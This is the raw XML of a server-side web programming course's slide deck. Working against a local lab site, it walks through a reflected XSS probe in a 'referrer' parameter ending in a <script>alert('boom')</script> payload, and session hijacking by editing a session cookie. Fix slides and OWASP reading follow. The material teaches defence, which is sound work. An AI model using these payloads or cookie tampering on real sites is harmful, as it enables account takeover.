            <a:off x="5853296" y="1990519"/>
            <a:ext cx="5982109" cy="2076656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639AD0A7-842C-759F-0A66-9CFAF00574F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5853296" y="4320334"/>
            <a:ext cx="5982109" cy="1588051"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="467377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Session Hijacking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886270" cy="3748193"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Cookie Quick Manager (or some other cookie manager) alter the value of the current session cookie for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>website to some of the other values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Open your browser to</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://127.0.0.1/xss%20Example/caribou_computers.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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You should now be logged in as that user!</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06228" y="2011641"/>
            <a:ext cx="1921044" cy="4138795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1979291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DD77-88F1-5BFD-EB02-86705A9A1FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>Fixing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687D23FF-1EC9-095A-93AF-254DC02100A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>The fix here would be simple.  Instead of creating our own session system we would use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>session_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>function.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t>In addition we should check the configuration in our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" dirty="0"/>
              <a:t> file to insure that it is sufficiently long. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3018221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fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read the following articles from OWASP.  Each one has a list of CWE’s (Common Weakness Enumerations) associated with it.  Choose two for each article and read them. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Insecure Design		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A04_2021-Insecure_Design/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Misconfiguration	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerable/Outdated	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID and Authentication Failures	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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305" y="2578919"/>
            <a:ext cx="5718348"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In order to determine if someone arrives at their site through an affiliate link.  The affiliate passes a parameter on the URL called ‘referrer’ and gives a unique id given to them by Caribou Computers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the interest of transparency Caribou Computers places a banner on their site telling users who owns the link that referred them.</a:t>
            </a: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8830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305" y="2578919"/>
            <a:ext cx="5718348"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For example, when someone clicks on the following link:</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hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://127.0.0.1/XSS%20Example/caribou_computers.php?referrer=Daves%20Fish%20Market</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t>The page looks like the image on the left.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5275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79" y="2120899"/>
            <a:ext cx="10058399" cy="1108076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So, let’s do some reconnaissance!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First, let’s look at the HTML that is being produced!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Market&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321708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79" y="2120899"/>
            <a:ext cx="10058399" cy="1108076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There’s nothing terribly strange but let's see if we can’t play with the URL a bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try adding &lt;b&gt;&lt;/b&gt; tags around the text we pass in: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://127.0.0.1/XSS%20Example/caribou_computers.php?referrer=%3Cb%3EDaves%20Fish%20Market%3C/b%3E</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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&lt;b&gt;</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Market&lt;/b&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159767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79" y="2120898"/>
            <a:ext cx="10058399" cy="1308101"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This works, and that tells us something. The URL allows us to pass in HTML tags!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we’ve learned JavaScript can be passed using a &lt;script&gt; tag…let’s see if that works!</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https://127.0.0.1/XSS Example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>caribou_computers.php?referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=&lt;b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Daves</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Fish Market&lt;/b&gt;&lt;script&gt;alert('boom')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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&lt;b&gt;</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Market&lt;/b&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13073844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{0304F9BE-F86B-4397-A5DD-B8898FF836C9}tf22712842_win32</Template>
  <TotalTime>2899</TotalTime>
  <Words>3775</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>194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Bookman Old Style</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>1_RetrospectVTI</vt:lpstr>
      <vt:lpstr>Server-Side Web Programming (COMP10260)</vt:lpstr>
      <vt:lpstr>Examples – Part II</vt:lpstr>
      <vt:lpstr>Getting started</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Caribou Computers</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Evilsite.com</vt:lpstr>
      <vt:lpstr>Fixing XSS</vt:lpstr>
      <vt:lpstr>A07:2021 – Identification and Authentication Failures</vt:lpstr>
      <vt:lpstr>A07:2021 – Identification and Authentication Failures</vt:lpstr>
      <vt:lpstr>A07:2021 – Identification and Authentication Failures</vt:lpstr>
      <vt:lpstr>A07:2021 – Identification and Authentication Failures</vt:lpstr>
      <vt:lpstr>Examples – Part III</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Session Hijacking</vt:lpstr>
      <vt:lpstr>Fixing Session Hijacking</vt:lpstr>
      <vt:lpstr>Media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Programming (COMP10260)</dc:title>
  <dc:creator>Graham, Jonathan</dc:creator>
  <cp:lastModifiedBy>Graham, Jonathan</cp:lastModifiedBy>
  <cp:revision>112</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-07T18:27:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-04T22:27:49Z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